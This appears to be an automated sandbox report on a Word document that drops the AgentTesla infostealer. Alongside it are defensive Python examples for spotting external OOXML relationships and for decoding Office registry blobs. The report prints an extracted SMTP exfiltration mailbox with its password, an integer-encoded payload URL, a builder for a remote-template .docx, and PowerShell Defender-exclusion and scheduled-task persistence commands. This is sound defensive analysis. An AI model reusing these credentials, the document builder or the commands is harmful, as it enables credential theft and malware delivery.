Analysis
-
max time kernel
102s -
max time network
104s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64 arch:x86 image:win7-20230220-en locale:en-us os:windows7-x64 system -
submitted
02-03-2023 07:00
Static task
static1
Behavioral task
behavioral1
Sample
POX010-240.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
POX010-240.docx
Resource
win10v2004-20230220-en
General
-
Target
POX010-240.docx
-
Size
10KB
-
MD5
1cb238263947b5019937888d3cad8833
-
SHA1
15d5367bd9cd0fb7fec8ca9ef2360b57a40c63c0
-
SHA256
3db84a830fee9dea668512769206f1002edf7d27747611f728c14974cd14726a
-
SHA512
d73cd6a02a2fb6f481a00b7e96d45b7091ac1a5a3fb57763923864fabacb2eb8c945150adf740a64d7d7eae94ac23c9b47b7471fc6e6a9a50f11aca051339748
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uO+A5Wgywl+CVWBXJC0c3hzVG:SPXU/slT+LO+mbywHkZC9K
Malware Config
Extracted
agenttesla
Protocol: smtp
Host: us2.smtp.mailhostbox.com
Port: 587
Username: 002@frem-tr.com
Password: jCXzqcP1 daniel 3116
Email To: 002@frem-tr.com
Signatures
-
AgentTesla
Agent Tesla is a .NET-based information stealer and remote access tool (RAT); the configuration extracted above shows this sample exfiltrating over SMTP with hard-coded mailbox credentials.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow  pid  process
7     900  EQNEDT32.EXE
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location 2 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\14.0\Common  WINWORD.EXE
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\Common\Offline\Files\http://3324948138/rr........................................................doc  WINWORD.EXE
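The second IoC above is the tell for this delivery chain: Word itself, with no macro, resolves http://3324948138/rr...doc while opening the 10KB .docx, which is what an external relationship in the OOXML package (typically an attachedTemplate relationship in word/_rels/settings.xml.rels) does. The host is an IPv4 address written as one decimal integer, a form that defeats naive dotted-quad IoC matching. The 12KB rr[1].doc later listed under Downloads is consistent with being the fetched second stage that Equation Editor then handled. The following added example (written for this page, not the sandbox vendor's code) builds a constructed .docx in memory with such a relationship and scans every .rels part for TargetMode="External", normalising integer-form hosts. The relationship type and the shortened file name rr.doc are assumptions; the report shows only the registry side effect.

```python
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

# Constructed relationship part (assumption: the sample used attachedTemplate; the
# report only shows Word caching http://3324948138/rr...doc). File name shortened.
SETTINGS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
                Target="http://3324948138/rr.doc" TargetMode="External"/>
</Relationships>"""


def build_sample_docx() -> bytes:
    """Minimal constructed OOXML package: just enough parts to be a plausible .docx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml",
                   "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        z.writestr("word/_rels/settings.xml.rels", SETTINGS_RELS)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """Yield (part, relationship type, target) for every External relationship
    in any *.rels part of the package, whatever the part is called."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rtype, rel.get("Target", "")))
    return hits


def normalise_host(url: str) -> str:
    """Return the dotted-quad form of a bare-integer IPv4 host (http://3324948138/),
    otherwise the host as written. Integer hosts are a common IoC-evasion trick."""
    host = urlsplit(url).hostname or ""
    if re.fullmatch(r"\d+", host) and int(host) < 2 ** 32:
        return str(ipaddress.IPv4Address(int(host)))
    return host


def triage(docx_bytes: bytes):
    """External relationships with their resolved host, ready for blocking/hunting."""
    return [(part, rtype, target, normalise_host(target))
            for part, rtype, target in external_relationships(docx_bytes)]


if __name__ == "__main__":
    for part, rtype, target, host in triage(build_sample_docx()):
        print(f"{part}: {rtype} -> {target} (host {host})")
```

Run the scanner on a suspected document with `triage(open(path, "rb").read())`; any External target that is not a harmless hyperlink in document.xml.rels deserves a closer look, and attachedTemplate, oleObject or frame targets pointing at an IP or integer host should be treated as hostile.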
Executes dropped EXE 3 IoCs
Processes:
pid   process
1488  vbc.exe
568   vbc.exe
1316  vbc.exe
Loads dropped DLL 2 IoCs
Processes:
pid  process
900  EQNEDT32.EXE
900  EQNEDT32.EXE
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
This signature matches on the file name only: the executed binary is the 977KB dropped file C:\Users\Public\vbc.exe, which borrows the name of the .NET Visual Basic compiler. The genuine vbc.exe lives under C:\Windows\Microsoft.NET\Framework*\ and is not involved here.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  vbc.exe
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  vbc.exe
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  vbc.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows\CurrentVersion\Run\gcWPrHZ = "C:\\Users\\Admin\\AppData\\Roaming\\gcWPrHZ\\gcWPrHZ.exe"  vbc.exe
Drops file in System32 directory 1 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description  pid  process  target process
PID 1488 set thread context of 1316  1488  vbc.exe  vbc.exe
Drops file in Windows directory 1 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). This generic signature is often associated with ransomware, but on its own it is not conclusive; here it sits alongside credential-theft behaviour, not file encryption.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Modifies Internet Explorer settings 31 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit  WINWORD.EXE
Key created  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell  WINWORD.EXE
Set value (str)  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"  WINWORD.EXE
Key created  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell  WINWORD.EXE
Key created  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar  WINWORD.EXE
Set value (str)  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command  WINWORD.EXE
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000  WINWORD.EXE
Set value (int)  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor  WINWORD.EXE
Set value (int)  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit  WINWORD.EXE
Set value (str)  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""  WINWORD.EXE
Key created  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""  WINWORD.EXE
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND  WINWORD.EXE
-
Modifies registry class 64 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command  WINWORD.EXE
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit  WINWORD.EXE
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"  WINWORD.EXE
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version  WINWORD.EXE
Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe  WINWORD.EXE
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic  WINWORD.EXE
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon  WINWORD.EXE
-
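Both the Internet Explorer settings list and the registry class list above contain opaque "Set value (data)" entries under ...\shell\edit\command\command. Those are UTF-16LE strings, and their layout (a 20-character compressed ProductCode, a feature name, ">", a 20-character compressed ComponentId, then the verb arguments) is the Windows Installer "Darwin descriptor" that Office 2010 writes when it re-registers its advertised file-type verbs; they are WINWORD.EXE housekeeping, not attacker-written data. The added example below (written for this page, not vendor code) decodes the three distinct blobs from the lists above so an analyst can confirm that quickly instead of chasing them; the constants are copied from the report, everything else is this example's own code.

```python
from dataclasses import dataclass

# REG_BINARY values copied verbatim from the IoC lists above (all written by WINWORD.EXE).
WORD_CMD = (
    "780062002700420056003500"
    "210021002100210021002100210021002100"
    "4d004b004b0053006b00"
    "57004f0052004400460069006c00650073003e00"
    "620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a007500"
    "20002f006e002000220025003100220000000000"
)
PUBLISHER_CMD = (
    "780062002700420056003500"
    "210021002100210021002100210021002100"
    "4d004b004b0053006b00"
    "5000750062005000720069006d006100720079003e00"
    "520024006e0075006a0053005700460065003f007d0061004c007200520070003900780040005700"
    "20002500310000000000"
)
EXCEL_CMD = (
    "780062002700420056003500"
    "210021002100210021002100210021002100"
    "4d004b004b0053006b00"
    "45005800430045004c00460069006c00650073003e00"
    "560069006a00710042006f006600280059003800270077002100460049006400310067004c005100"
    "20002f0064006400650000000000"
)


@dataclass
class DarwinDescriptor:
    product: str    # 20-char compressed ProductCode GUID (Windows Installer encoding)
    feature: str    # MSI feature name the verb is advertised for, e.g. WORDFiles
    component: str  # 20-char compressed ComponentId GUID
    args: str       # verb arguments Office appends, e.g. /n "%1"


def decode_reg_binary_utf16(hex_data: str) -> str:
    """Sandbox dumps REG_BINARY as hex; Office stores these as NUL-padded UTF-16LE."""
    return bytes.fromhex(hex_data).decode("utf-16-le").rstrip("\x00")


def parse_darwin_descriptor(text: str) -> DarwinDescriptor:
    """Split a decoded advertised-verb string into its Darwin descriptor fields."""
    product, rest = text[:20], text[20:]
    feature, rest = rest.split(">", 1)
    return DarwinDescriptor(product, feature, rest[:20], rest[20:].strip())


def summarise(blobs: dict) -> dict:
    """Map a registry value name to (feature, args) for quick eyeballing."""
    out = {}
    for name, hex_data in blobs.items():
        d = parse_darwin_descriptor(decode_reg_binary_utf16(hex_data))
        out[name] = (d.feature, d.args)
    return out


if __name__ == "__main__":
    for name, (feature, args) in summarise(
        {"Word": WORD_CMD, "Publisher": PUBLISHER_CMD, "Excel": EXCEL_CMD}
    ).items():
        print(f"{name}: feature={feature} args={args}")
```

If a decoded value does not fit this shape, or the arguments launch something other than the registered Office binary, the entry deserves the scrutiny these did not.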
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid   process
1248  WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid   process
1488  vbc.exe
1488  vbc.exe
1488  vbc.exe
1488  vbc.exe
1936  powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
description                 pid   process
Token: SeDebugPrivilege     1488  vbc.exe
Token: SeDebugPrivilege     1316  vbc.exe
Token: SeDebugPrivilege     1936  powershell.exe
Token: SeShutdownPrivilege  1248  WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid   process
1248  WINWORD.EXE
1248  WINWORD.EXE
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
description                       pid   process       target process  events
PID 900 wrote to memory of 1488   900   EQNEDT32.EXE  vbc.exe         4
PID 1248 wrote to memory of 360   1248  WINWORD.EXE   splwow64.exe    4
PID 1488 wrote to memory of 1936  1488  vbc.exe       powershell.exe  4
PID 1488 wrote to memory of 1580  1488  vbc.exe       schtasks.exe    4
PID 1488 wrote to memory of 568   1488  vbc.exe       vbc.exe         4
PID 1488 wrote to memory of 1316  1488  vbc.exe       vbc.exe         9
outlook_office_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  vbc.exe
-
outlook_win_path 1 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  vbc.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE  (level 1, PID 1248)
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\POX010-240.docx"
    - Abuses OpenXML format to download file from external location
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  C:\Windows\splwow64.exe  (level 2, PID 360)
      C:\Windows\splwow64.exe 12288
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  (level 1, PID 900)
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Launches Equation Editor
    - Suspicious use of WriteProcessMemory
  C:\Users\Public\vbc.exe  (level 2, PID 1488)
      "C:\Users\Public\vbc.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (level 3, PID 1936)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gmRCHGfmw.exe"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\schtasks.exe  (level 3, PID 1580)
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gmRCHGfmw" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1A17.tmp"
        - Creates scheduled task(s)
    C:\Users\Public\vbc.exe  (level 3, PID 568)
        "C:\Users\Public\vbc.exe"
        - Executes dropped EXE
    C:\Users\Public\vbc.exe  (level 3, PID 1316)
        "C:\Users\Public\vbc.exe"
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Adds Run key to start application
